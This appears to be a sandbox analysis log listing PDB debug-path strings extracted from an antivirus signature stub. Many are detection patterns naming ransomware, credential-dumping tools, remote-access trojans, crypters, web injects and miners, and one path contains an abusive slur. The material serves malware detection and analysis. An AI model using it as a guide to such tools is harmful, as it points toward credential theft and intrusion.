Source:	Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp
Source:	Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdb source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: cryptdll.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: reg.pdbd source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp
Source:	Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: .+:\\.+\\.Pedro\\.PH_Secret_Application.\\PH_Secret_Application.\\.+\\Release\\.*.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: !6zyA6@267=HPS.C\|dMqd4-qaN\|yjm.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: @.pdb source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp
Source:	Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp
Source:	Binary string: vssadmin.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp
Source:	Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000026.00000003.18332878772.00000138BD2D2000.00000004.00000001.sdmp
Source:	Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: lsasrv.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: PELoader.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: \Release\ProtectedService.pdb source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp
Source:	Binary string: \Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp
Source:	Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \FARATCLIENT\obj\Debug\FARATCLIENT.pdb source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: hal.pdb source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp
Source:	Binary string: JOe\|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \mspass.pdb source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp
Source:	Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: 3.C:\\Obnubilate\\Temp\\[a-z0-9]{26}\\Stub\.pdb source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp
Source:	Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp
Source:	Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: iashlpr.pdb source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp
Source:	Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: ZAService.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: gMolq.pdb source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp
Source:	Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: rStub\LimitlessLoggerStub\obj\x86\Debug\LLS.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: fk_drv.pdb] source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: RamMap.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: aeroadmin.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: rpcss.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: \Release\UpdaterService.pdb source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp
Source:	Binary string: \Rasomware2.0.pdb source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: m3KHLMcF.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: sdmf\|er.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x86\Release_logged\payload32.pdb source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp
Source:	Binary string: CrossLoopService.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: hcd:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: ir41_qcx.pdb source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp
Source:	Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: mciole32.pdb source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdbaA source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: irprops.pdbj source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: Pb730.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: borlo 1.9.7 src\WindowsApplication1\obj\Debug\Winlogon.pdb source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: 0rStub\LimitlessLoggerStub\obj\x86\Debug\LLS.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdbj source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: +kill\yourself\@YongruiTan\chinese\idiot.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: tixati.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: uigjhghio.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: \P2P\Client\Debug\Client.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 00000026.00000003.18351876437.00000138BCDCA000.00000004.00000001.sdmp
Source:	Binary string: Amon\Current\nethfdrv\Production\netupdsrv.pdb source: MpSigStub.exe, 00000026.00000003.18296056460.00000138BE07F000.00000004.00000001.sdmp
Source:	Binary string: SKRFM.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: appmgmts.pdb source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: DownExecute.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: \GG-Ransomware-master\GG ransomware\GG ransomware\obj\Debug\Ransom.pdb source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp
Source:	Binary string: \defeat\rtl49.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: \i386\Driver.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp
Source:	Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 'c:\Top\Train\job\Wall\Did\Spendkept.pdb] source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp
Source:	Binary string: 2 Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp
Source:	Binary string: wpnpinst.pdb source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp
Source:	Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: @g-e3e_2qalAN+/PaKV/J.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: 0\wrapper3.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: SuzanDLL\Release\suzanw.pdb source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: cmd.pdb source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp
Source:	Binary string: d+D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: er.pdb source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp
Source:	Binary string: diskpart.pdb source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x64\Release_logged\webinject64.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: "E:\DLMon5\drv\obj\i386\RioDrvs.pdba source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp
Source:	Binary string: module_ls.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb~ source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp
Source:	Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp
Source:	Binary string: \\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp
Source:	Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: X:\\DEgELgPMENT\\VC\+\+\\CrgptorgEvolugionggld\\relgase\\m.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: wmidx.pdbj source: MpSigStub.exe, 00000026.00000003.18309839037.00000138BE5D9000.00000004.00000001.sdmp
Source:	Binary string: dsget.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: ramaint.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: mstext40.pdb3 source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\MARIO\source\repos\ENCRIPTAR\x64\Release\ENCRIPTAR.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: ,ByShell_Up19\DarkShell\Release\DarkShell.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: ZohoTray.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: ,IKlllQWgbhejkWEJKHw7\\werrnJEKLJ32hjelkk.PDB source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: DDTBG.pdb source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: \iSafeKrnlKit.pdb source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp
Source:	Binary string: version.pdb@SH source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-2.pdb source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdb source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp
Source:	Binary string: LERKBleRM.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: c:\stayWide\softthey\markethorse\bothside\of.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: \devilman\xxxxx\catfight\iygmygjkxtyu.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: Release\RuPass.pdb] source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \Release\bdSetup.pdb source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp
Source:	Binary string: Release\VersionChecker.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: SkypeTOPA\obj\Debug\PnonaSkype.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
